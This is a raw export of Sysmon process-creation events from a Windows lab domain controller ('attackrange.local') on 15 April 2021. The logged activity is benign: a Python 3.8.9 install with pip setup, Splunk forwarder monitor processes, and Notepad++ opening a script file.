14:37:53.210{A8622C2F-4FC1-6078-1C07-00000000AE01}5832C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe3.8.9PythonPythonPython Software Foundationpy.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -OO -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=79C93996908FFDD05B18DC0D7DF1932E,SHA256=0BD3CBF4774123ACEFD938B257EBC89C17C4B476BA2420DF6951BC46D40D4C99,IMPHASH=934A502B70E6FF941EE6D20F8BC3B8EE{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872 154100x800000000000000037895Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:45.961{A8622C2F-4FB9-6078-1807-00000000AE01}5196C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -O -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FB9-6078-1607-00000000AE01}1536C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -O -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib" 154100x800000000000000037882Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:45.932{A8622C2F-4FB9-6078-1607-00000000AE01}1536C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe3.8.9PythonPythonPython Software Foundationpy.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -O -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=79C93996908FFDD05B18DC0D7DF1932E,SHA256=0BD3CBF4774123ACEFD938B257EBC89C17C4B476BA2420DF6951BC46D40D4C99,IMPHASH=934A502B70E6FF941EE6D20F8BC3B8EE{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872 154100x800000000000000037848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:38.505{A8622C2F-4FB2-6078-1507-00000000AE01}6684C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FB2-6078-1307-00000000AE01}5508C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib" 154100x800000000000000037835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:38.463{A8622C2F-4FB2-6078-1307-00000000AE01}5508C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe3.8.9PythonPythonPython Software Foundationpy.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=79C93996908FFDD05B18DC0D7DF1932E,SHA256=0BD3CBF4774123ACEFD938B257EBC89C17C4B476BA2420DF6951BC46D40D4C99,IMPHASH=934A502B70E6FF941EE6D20F8BC3B8EE{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872 154100x800000000000000037728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:33.361{A8622C2F-4FAD-6078-1207-00000000AE01}6012C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -c " import runpy import sys sys.path = ['C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\tmpjgat20w4\\setuptools-49.2.1-py3-none-any.whl', 'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\tmpjgat20w4\\pip-20.2.3-py2.py3-none-any.whl'] + sys.path sys.argv[1:] = ['install', '--no-cache-dir', '--no-index', '--find-links', 'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\tmpjgat20w4', '--upgrade', 'setuptools', 'pip'] runpy.run_module(\"pip\", run_name=\"__main__\", alter_sys=True) "C:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FAC-6078-1007-00000000AE01}3208C:\Program Files\Python38\python.exe"C:\Program Files\Python38\python.exe" -E -s -m ensurepip -U --default-pip 154100x800000000000000037714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:32.991{A8622C2F-4FAC-6078-1007-00000000AE01}3208C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -E -s -m ensurepip -U --default-pipC:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FAC-6078-0F07-00000000AE01}7060C:\Windows\SysWOW64\msiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A4E6E1AB8EB7015F3DEE8A6A4D4540 154100x800000000000000037704Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:32.857{A8622C2F-4FAC-6078-0F07-00000000AE01}7060C:\Windows\SysWOW64\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A9A4E6E1AB8EB7015F3DEE8A6A4D4540C:\Windows\SysWOW64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0BDEAEA7BB4AE7822416CD37EA8EE00D,SHA256=5C188CE4E21FAB002B4D669F91FA19341AB4260F83D798FDAC53229D675DB6BA,IMPHASH=B4730776DFCE61DBCD10D002E3D530E1{A8622C2F-4F9E-6078-0707-00000000AE01}616C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /V 154100x800000000000000037310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:22.956{A8622C2F-4FA2-6078-0C07-00000000AE01}5508C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037253Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:21.310{A8622C2F-4FA1-6078-0B07-00000000AE01}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:20.597{A8622C2F-4FA0-6078-0A07-00000000AE01}2352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037168Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:19.926{A8622C2F-4F9F-6078-0807-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:18.449{A8622C2F-4F9E-6078-0707-00000000AE01}616C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9,IMPHASH=18A9F87944C357EB02511FDF4A18E19B{A8622C2F-3DEC-6078-0A00-00000000AE01}832C:\Windows\System32\services.exeC:\Windows\system32\services.exe 154100x800000000000000037044Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:18.237{A8622C2F-4F9E-6078-0607-00000000AE01}4664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:18.054{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe3.8.9150.0Python 3.8.9 (64-bit)Python 3.8.9 (64-bit)Python Software Foundationpython-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C40433FA39A526D340B8C9289ECB8D03,SHA256=A25DA599FA29B647D8CFD7859507A5F22A6D4ECB8ADEC400119916125361E48E,IMPHASH=D7E2FD259780271687FFCA462B9E69B7{A8622C2F-4F90-6078-0207-00000000AE01}2872C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe"C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe" -burn.clean.room="C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" -burn.filehandle.attached=500 -burn.filehandle.self=504 154100x800000000000000037019Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:17.570{A8622C2F-4F9D-6078-0407-00000000AE01}5852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000037009Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:16.891{A8622C2F-4F9C-6078-0307-00000000AE01}5964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:04.327{A8622C2F-4F90-6078-0207-00000000AE01}2872C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe3.8.9150.0Python 3.8.9 (64-bit)Python 3.8.9 (64-bit)Python Software Foundationpython-3.8.9-amd64.exe"C:\Windows\Temp\{BA8896E4-BE04-422C-91EE-24052508D566}\.cr\python-3.8.9-amd64.exe" -burn.clean.room="C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" -burn.filehandle.attached=500 -burn.filehandle.self=504 C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C40433FA39A526D340B8C9289ECB8D03,SHA256=A25DA599FA29B647D8CFD7859507A5F22A6D4ECB8ADEC400119916125361E48E,IMPHASH=D7E2FD259780271687FFCA462B9E69B7{A8622C2F-4F8F-6078-0107-00000000AE01}6656C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe"C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" 154100x800000000000000036949Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:03.567{A8622C2F-4F8F-6078-0107-00000000AE01}6656C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe3.8.9150.0Python 3.8.9 (64-bit)Python 3.8.9 (64-bit)Python Software Foundationpython-3.8.9-amd64.exe"C:\Users\Administrator\Downloads\python-3.8.9-amd64.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F69D9C918A8AD06C71D7F0F26CCFEE12,SHA256=E15BC52914B6DAEE9630360BFE3708EE646D4E4CE34BF5368066213009AF70A6,IMPHASH=D7E2FD259780271687FFCA462B9E69B7{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000036619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:22.941{A8622C2F-4F66-6078-FF06-00000000AE01}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036600Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:21.418{A8622C2F-4F65-6078-FE06-00000000AE01}5212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036591Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:20.749{A8622C2F-4F64-6078-FD06-00000000AE01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:20.073{A8622C2F-4F64-6078-FC06-00000000AE01}4940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036570Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:18.230{A8622C2F-4F62-6078-FB06-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:17.561{A8622C2F-4F61-6078-FA06-00000000AE01}4832C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:36:16.886{A8622C2F-4F60-6078-F906-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:36.250{A8622C2F-4F38-6078-F606-00000000AE01}5444C:\Program Files\Notepad++\updater\GUP.exe5.13WinGup for Notepad++WinGup for Notepad++Don HO don.h@free.frgup.exe"C:\Program Files\Notepad++\updater\gup.exe" -v7.95 -px64C:\Program Files\Notepad++\updater\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=EA20C0550A753BF194FA02A52A0CB932,SHA256=70FF333305CE2C4FBD5C583B3158A2A083D784C0F8A3D2AE09D55568E19BCD7E,IMPHASH=0AC02220E25075D21D6FCE74AEF267AF{A8622C2F-4F38-6078-F506-00000000AE01}6896C:\Program Files\Notepad++\notepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\minidns.py" 154100x800000000000000036364Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:36.019{A8622C2F-4F38-6078-F506-00000000AE01}6896C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\minidns.py"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000036334Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:22.918{A8622C2F-4F2A-6078-F406-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000036322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:35:21.519{A8622C2F-4F29-6078-F306-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 